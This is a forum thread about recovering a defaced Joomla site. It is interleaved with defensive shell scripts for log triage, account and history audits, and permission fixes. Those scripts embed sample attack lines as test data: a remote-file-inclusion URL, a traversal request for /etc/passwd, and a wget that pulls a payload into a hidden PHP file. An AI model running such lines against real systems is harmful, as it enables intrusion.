My Website Just Got Hacked!

31 replies to this topic

#1 VladCazan
  • Members
  • 32 posts
  • Joined: 08-March 10
  • Location: Toronto, Ontario
  • Expertise: HTML, CSS, PHP, Java, Javascript, SQL, Flash
I run a small, very small hosting company for my school. I basically just bought some reseller hosting and I create new shared cPanel hosting packages; this is for very simple HTML/CSS learning or for WordPress blogs. The front end of the website runs off the Joomla! CMS, and this morning it was hacked with a custom screen.

[Posted image]

Does anyone know what I should be doing after this happens? I took the site offline. It seems they only got to Joomla, not WHMCS or cPanel or WHM, so it's probably on the Joomla side. I've changed passwords and made backups. Is there anything else?

#2 iPhone
  • Members
  • 50 posts
  • Joined: 08-March 10
  • Location: Maldives
  • Expertise: HTML, CSS, PHP, Graphics, Flash
Make a custom PHP site with CSS...
No need for Joomla XD

#3 BlaDe
  • Members
  • 3 posts
  • Joined: 08-March 10

VladCazan wrote:
    I run a small, very small hosting company for my school. I basically just bought some reseller hosting and I create new shared cPanel hosting packages; this is for very simple HTML/CSS learning or for WordPress blogs. The front end of the website runs off the Joomla! CMS, and this morning it was hacked with a custom screen.
    ..
    Does anyone know what I should be doing after this happens? I took the site offline. It seems they only got to Joomla, not WHMCS or cPanel or WHM, so it's probably on the Joomla side. I've changed passwords and made backups. Is there anything else?

Do you keep access logs? (Apache stores them by default.) Ensure you have the latest Joomla, as you're right that it's likely this which compromised your system.
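
An added example (not from the original thread) of how to triage the raw Apache access log BlaDe is asking about, and how to pull one IP's whole session once it stands out, which is what VladCazan ends up doing in post #15. The log lines are constructed for this example using documentation-range IPs; the request patterns they match (directory traversal, a null byte, a URL passed as a parameter value for remote file inclusion, inline PHP, and POSTs to the Joomla administrator backend) are the classic ones scanners and defacement bots leave behind. The function names are mine. On a cPanel account the raw logs live under the account's access-logs directory (an assumption; check your host) and can be passed in place of the sample file.

```shell
#!/bin/sh
# Added example, not code from the original thread. Triage an Apache
# combined-format access log for the requests that typically precede a
# Joomla defacement, then pull the full session of the IP that stands out.

# Constructed sample log for this example (documentation-range IPs).
SAMPLE_LOG=$(cat <<'EOF'
203.0.113.7 - - [08/Mar/2010:03:12:01 -0500] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
198.51.100.9 - - [08/Mar/2010:03:14:09 -0500] "GET /index.php?option=com_foo&mosConfig_absolute_path=http://198.51.100.20/shell.txt? HTTP/1.1" 200 1402 "-" "libwww-perl/5.805"
198.51.100.9 - - [08/Mar/2010:03:14:22 -0500] "GET /index.php?option=com_foo&controller=../../../../etc/passwd%00 HTTP/1.1" 200 1402 "-" "libwww-perl/5.805"
198.51.100.9 - - [08/Mar/2010:03:14:25 -0500] "GET /administrator/ HTTP/1.1" 200 3310 "-" "libwww-perl/5.805"
198.51.100.9 - - [08/Mar/2010:03:14:40 -0500] "POST /administrator/index.php HTTP/1.1" 303 0 "-" "libwww-perl/5.805"
198.51.100.9 - - [08/Mar/2010:03:15:02 -0500] "POST /administrator/index.php?option=com_templates HTTP/1.1" 303 0 "-" "libwww-perl/5.805"
203.0.113.7 - - [08/Mar/2010:03:20:11 -0500] "GET /templates/rhuk_milkyway/index.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
EOF
)
LOG=$(mktemp)
printf '%s\n' "$SAMPLE_LOG" > "$LOG"

# Every request matching a classic web-app attack pattern: directory
# traversal (plain or URL-encoded), a null byte, a URL supplied as a
# parameter value (remote file inclusion), inline PHP, or any POST to
# the Joomla administrator backend.
suspicious_requests() {
    grep -E -i '(\.\./|%2e%2e/|%00|=(https?|ftp)://|<\?php|"POST /administrator/)' "$1"
}

# Count those hits per client IP so the noisiest source floats to the top.
suspicious_ips() {
    suspicious_requests "$1" | awk '{print $1}' | sort | uniq -c | sort -rn
}

# The single noisiest IP, for the ban list or an abuse report.
top_suspicious_ip() {
    suspicious_ips "$1" | head -n 1 | awk '{print $2}'
}

# Once an IP stands out, pull its complete session to build the timeline:
# what it probed, when it reached the admin login, and when it wrote the template.
ip_activity() {
    awk -v ip="$2" '$1 == ip' "$1"
}

suspicious_requests "$LOG"
echo "--- suspicious hits per IP ---"
suspicious_ips "$LOG"
echo "--- full session of $(top_suspicious_ip "$LOG") ---"
ip_activity "$LOG" "$(top_suspicious_ip "$LOG")"
```

Run it against the real log with `suspicious_requests ~/access-logs/example.com` (path is an assumption). The POST-to-administrator match is the useful one when the attacker came in through a stolen or weak password rather than a component bug: a 303 after a POST to /administrator/index.php is a successful backend login, and everything that IP does afterwards is the defacement itself.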

#4 Necrotex
  • Members
  • 43 posts
  • Joined: 08-March 10
  • Location: Cologne - Germany
  • Expertise: HTML, CSS, PHP, Javascript, Python, SQL
Take a look through all logs related to the site (web server, database etc.). Try to find out how they got you and then close the hole ^^
Also look in the .bash_history file for any commands you can't remember, and make sure there are no new users (cat /etc/passwd or something like that ^^). But that's the worst case.

--Necro
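
The two checks Necrotex suggests, made repeatable, as an added example that is not part of the original thread: compare the current /etc/passwd against a known-good copy and flag any account with UID 0 that is not root, then grep the shell history for the commands attackers typically run after landing on a box. The passwd snapshots and history file below are constructed for this example, and the function names are mine.

```shell
#!/bin/sh
# Added example, not code from the original thread. Account and shell-history
# audit after a suspected compromise. All three input files are constructed.

BASELINE=$(mktemp); CURRENT=$(mktemp); HISTORY=$(mktemp)

# /etc/passwd as saved before the incident (from a backup, ideally).
cat > "$BASELINE" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
vlad:x:1000:1000:Vlad:/home/vlad:/bin/bash
EOF

# The same file today: one account added, and it has UID 0 without being root.
cat > "$CURRENT" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
vlad:x:1000:1000:Vlad:/home/vlad:/bin/bash
sysupd:x:0:0::/tmp/.x:/bin/bash
EOF

# A .bash_history with a few commands the owner does not remember typing.
cat > "$HISTORY" <<'EOF'
ls -la
cd /var/www/html
vi templates/rhuk_milkyway/index.php
cd /tmp
wget http://198.51.100.20/c.txt -O .c.php
chmod 777 .c.php
perl -e 'use Socket;...'
exit
EOF

# Usernames present now that were not in the baseline snapshot.
# First pass (NR==FNR) indexes the baseline; second pass prints the unknown ones.
new_accounts() {
    awk -F: 'NR==FNR {seen[$1]=1; next} !($1 in seen) {print $1}' "$1" "$2"
}

# Any account with UID 0 other than root: a classic way to keep root access
# that a simple "is there a new user?" glance can miss.
extra_uid0() {
    awk -F: '$3 == 0 && $1 != "root" {print $1}' "$1"
}

# History lines that download, stage or execute something: downloaders,
# chmod 7xx, scripting one-liners, netcat, anything in /tmp, hidden .php files.
suspicious_history() {
    grep -E -i '(wget |curl |chmod 7|perl -e|python -c|(^| )nc |/tmp|\.[a-z0-9_]+\.php)' "$1"
}

echo "accounts added since baseline:"; new_accounts "$BASELINE" "$CURRENT"
echo "non-root UID 0 accounts:";       extra_uid0 "$CURRENT"
echo "suspicious history lines:";      suspicious_history "$HISTORY"
```

Two caveats a practitioner would add: the baseline has to predate the incident (a copy from your last backup works), and .bash_history is only evidence when the attacker did not think to clear it, so an empty or suspiciously short history is itself a finding.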

#5 JackHarley (Jack)
  • Members
  • 1275 posts
  • Joined: 08-March 10
  • Location: Ireland
  • Expertise: HTML, CSS, PHP, Javascript, SQL
I'm guessing this is an automated attack, done by bots which scour the internet looking for vulnerable targets.

Check your file permissions; make sure no folder is 0777 unless it ABSOLUTELY has to be.
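
An added example (not from the original thread) of the permission check JackHarley describes and the 755 question VladCazan raises later: list every directory and file under a document root that any user on the box can write to, then tighten directories to 755 and files to 644. The directory tree is constructed for this example so it runs anywhere; the function names are mine.

```shell
#!/bin/sh
# Added example, not code from the original thread. Find and fix world-writable
# paths under a site's document root. The sample tree is constructed.

# Builds a small Joomla-like tree with two 0777 folders and one 0666 file,
# and prints its path. On a real box you would skip this and pass the
# account's document root to the functions below.
build_sample_tree() {
    tree_root=$(mktemp -d)
    mkdir -p "$tree_root/templates/rhuk_milkyway" "$tree_root/images/stories" "$tree_root/cache"
    : > "$tree_root/templates/rhuk_milkyway/index.php"
    : > "$tree_root/configuration.php"
    chmod 755 "$tree_root/templates" "$tree_root/templates/rhuk_milkyway" "$tree_root/images"
    chmod 777 "$tree_root/images/stories" "$tree_root/cache"      # the bad ones
    chmod 666 "$tree_root/templates/rhuk_milkyway/index.php"       # anyone can deface this
    chmod 644 "$tree_root/configuration.php"
    echo "$tree_root"
}

# Everything under $1 that any user on the box can write to.
# -perm -0002 tests the "other write" bit regardless of the rest of the mode,
# so it catches 777, 666, 757 and so on in one pass.
world_writable() {
    find "$1" \( -type d -o -type f \) -perm -0002 | sort
}

count_world_writable() {
    world_writable "$1" | wc -l | tr -d ' '
}

# Directories to 755, files to 644; prints each path it changed.
fix_world_writable() {
    find "$1" -type d -perm -0002 -exec chmod 755 {} \; -print
    find "$1" -type f -perm -0002 -exec chmod 644 {} \; -print
}

ROOT=$(build_sample_tree)
echo "world-writable before:"; world_writable "$ROOT"
echo "fixing:";                fix_world_writable "$ROOT"
echo "world-writable after: $(count_world_writable "$ROOT")"
```

On a real account run `world_writable ~/public_html` (path is an assumption) before touching anything, so you have a record of what was open. If a component genuinely needs to write somewhere (a cache or upload folder), give the web server's user ownership or group write on that one folder rather than world write; on cPanel hosts running PHP as the account user (suPHP/suexec), 755 and 644 are already enough.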


#6 VladCazan
  • Members
  • 32 posts
  • Joined: 08-March 10
  • Location: Toronto, Ontario
  • Expertise: HTML, CSS, PHP, Java, Javascript, SQL, Flash
Yes, I have raw access logs for cPanel, but I don't think Joomla does the same. It'll take a little investigating to see if they did get into cPanel; then I have a larger problem.

But I think iPhone is right... it was just a Joomla template with an iframe loading in WHMCS. It made it look pretty, but I'm sure I can do the same with one little page and lose the whole SQL database.

Thanks Necrotex, I checked: no new user was created, BUT they changed my super admin password. That's just encoded through MD5 though; I can just create a new account and then delete the old one. It's so strange, as Joomla was up to date.

#7 NinjaLikesCheez
  • Members
  • 18 posts
  • Joined: 08-March 10
  • Expertise: HTML, CSS
I like how they put "copyrighted", like hacking is a copyrightable topic :P

Well I hope they didn't fuck anything up.
Hello webdevrefinery!

#8 VladCazan
  • Members
  • 32 posts
  • Joined: 08-March 10
  • Location: Toronto, Ontario
  • Expertise: HTML, CSS, PHP, Java, Javascript, SQL, Flash
Haha yeah, a friend noticed that too, pretty funny, like I'm going to steal their name after they hacked me lol.

Everything was fine, I'm just working on a custom HTML page to put up while I assess the damage.

#9 Traffic
  • Members
  • 22 posts
  • Joined: 08-March 10
  • Expertise: HTML, PHP, Java, Javascript, SQL
I've just Googled 'UAH-CREW' and they've hacked a lot of sites! But most likely Joomla's CMS.

So be careful!
Traffic
Mobile Traffic News

#10 Olli (Veteran)
  • Members
  • 685 posts
  • Joined: 08-March 10
  • Location: England, Manchester
  • Expertise: HTML, CSS, Graphics
They have hacked loads of other sites, including one owned by the government.

check it out [Here]

Steam: Ollibreh

if you want to achieve greatness stop asking for permission


#11 Traffic
  • Members
  • 22 posts
  • Joined: 08-March 10
  • Expertise: HTML, PHP, Java, Javascript, SQL
But how can they do it??

I own a couple of Joomla-based sites, and I think it's a little scary knowing this!

I know I shouldn't use a CMS, but I had no time and I needed the sites online :P

Edit: I've just checked my sites and they are OK, uff!

#12 Necrotex
  • Members
  • 43 posts
  • Joined: 08-March 10
  • Location: Cologne - Germany
  • Expertise: HTML, CSS, PHP, Javascript, Python, SQL
Well, mostly they used a SQL injection or a remote file inclusion (if you don't know what this is, Google it ;)). If your systems (the Joomla CMS) are up to date, the chances that this is possible are very low. But to check whether you're secure, here's a list of current Joomla flaws: http://www.exploit-db.com/papers/11629

- Necro

#13 Dissident
  • Members
  • 144 posts
  • Joined: 08-March 10

Traffic wrote:
    But how can they do it??

    I own a couple of Joomla-based sites, and I think it's a little scary knowing this!

    I know I shouldn't use a CMS, but I had no time and I needed the sites online :P

    Edit: I've just checked my sites and they are OK, uff!

Joomla is awful. And I mean awful. Consider something else if you are looking for security.

#14 VladCazan
  • Members
  • 32 posts
  • Joined: 08-March 10
  • Location: Toronto, Ontario
  • Expertise: HTML, CSS, PHP, Java, Javascript, SQL, Flash
What do you guys suggest, what should I use for my CMS? I mean, everyone loves to code from scratch, but sometimes there is no time for that......

...BTW nothing on my SQL database was hacked.......only the template. I changed my template and everything was fine, so the /templates folder is going back to 755?

#15 VladCazan
  • Members
  • 32 posts
  • Joined: 08-March 10
  • Location: Toronto, Ontario
  • Expertise: HTML, CSS, PHP, Java, Javascript, SQL, Flash
Finally!!! I found the IP address of the hacker and I have found exactly what he did. He just changed the index.html file from my template to the red font and such. Very easy fix, very annoying!

So please add this IP to the banned list on your server and save yourself some trouble.

IP: 79.106.109.44
Country: Albania

NetRange:   79.0.0.0 - 79.255.255.255 
CIDR:       79.0.0.0/8 
NetName:    79-RIPE
NetHandle:  NET-79-0-0-0-1
Parent:     
NetType:    Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: SUNIC.SUNET.SE
NameServer: NS2.LACNIC.NET
Comment:    These addresses have been further assigned to users in
Comment:    the RIPE NCC region. Contact information can be found in
Comment:    the RIPE database at http://www.ripe.net/whois
RegDate:    2006-08-29
Updated:    2009-05-18
 
# ARIN WHOIS database, last updated 2010-03-07 20:00
# Enter ? for additional hints on searching ARIN's WHOIS database.
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at https://www.arin.net/whois_tou.html
 
 
 
Deferred to specific whois server: whois.ripe.net...
 
 
% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf
 
% Note: This output has been filtered.
%       To receive output for a database update, use the "-B" flag.
 
% Information related to '79.106.0.0 - 79.106.255.255'
 
inetnum:        79.106.0.0 - 79.106.255.255
org:            ORG-AS1-RIPE
netname:        al-atnet-20071123
descr:          Albtelecom Sh.a.
country:        AL
admin-c:        VT846-RIPE
tech-c:         HH846-RIPE
status:         ALLOCATED PA
mnt-by:         RIPE-NCC-HM-MNT
mnt-lower:      ALBTELECOM-MNT
mnt-routes:     ALBTELECOM-MNT
source:         RIPE # Filtered
 
organisation:   ORG-AS1-RIPE
org-name:       Albtelecom Sh.a.
org-type:       LIR
address:        ALBTELECOM Sh.a
                Rr "M.Shyri" N42
                Tirane
                Albania
phone:          +355 4 2232200
fax-no:         +355 4 2232200
e-mail:         h.hoxha@atnet.al
admin-c:        HH846-RIPE
admin-c:        VT846-RIPE
mnt-ref:        ALBTELECOM-MNT
mnt-ref:        RIPE-NCC-HM-MNT
mnt-by:         RIPE-NCC-HM-MNT
source:         RIPE # Filtered
 
person:         Vilma Tomco
address:        Albtelecom Sh.a.
phone:          +355 4 2232200
fax-no:         +355 4 2232200
e-mail:         vilma.tomco@albtelecom.al
nic-hdl:        VT846-RIPE
source:         RIPE # Filtered
 
person:         Hysen Hoxha
address:        Albtelekom Sh.a.
phone:          +355 4 2375641
fax-no:         +355 4 2375641
e-mail:         hhoxha@atnet.al
nic-hdl:        hh846-RIPE
source:         RIPE # Filtered
remarks:
 
% Information related to '79.106.109.0/24AS42313'
 
route:          79.106.109.0/24
descr:          BGP-ADVERT-ALBTELCO
origin:         AS42313
mnt-by:         ALBTELECOM-MNT
source:         RIPE # Filtered


#16 Dissident
  • Members
  • 144 posts
  • Joined: 08-March 10
lol, you did an ARIN whois on an IP allocated to RIPE. Use this.

#17 VladCazan
  • Members
  • 32 posts
  • Joined: 08-March 10
  • Location: Toronto, Ontario
  • Expertise: HTML, CSS, PHP, Java, Javascript, SQL, Flash

Dissident wrote:
    lol, you did an ARIN whois on an IP allocated to RIPE. Use this.

Thanks, now who wants to go to Albania and smack this 15-year-old in the face.

#18 Traffic
  • Members
  • 22 posts
  • Joined: 08-March 10
  • Expertise: HTML, PHP, Java, Javascript, SQL

Dissident wrote:
    Joomla is awful. And I mean awful. Consider something else if you are looking for security.

I didn't know that, now I'm a little scared.

VladCazan wrote:
    What do you guys suggest, what should I use for my CMS? I mean, everyone loves to code from scratch, but sometimes there is no time for that......

Like VladCazan said, sometimes there is no time.

Which CMS do you recommend for us?

#19 Dissident
  • Members
  • 144 posts
  • Joined: 08-March 10
Honestly, I can't recommend any. I simply have never run a CMS on a website that I hadn't coded myself. The basics: if it's a large project with tons of developers, it is typically vulnerable beyond all belief.

#20 Parsa
  • Members
  • 6 posts
  • Joined: 08-March 10
If you are going to use open source, I would say the top two in terms of security are Drupal (PHP) and Alfresco (Java).



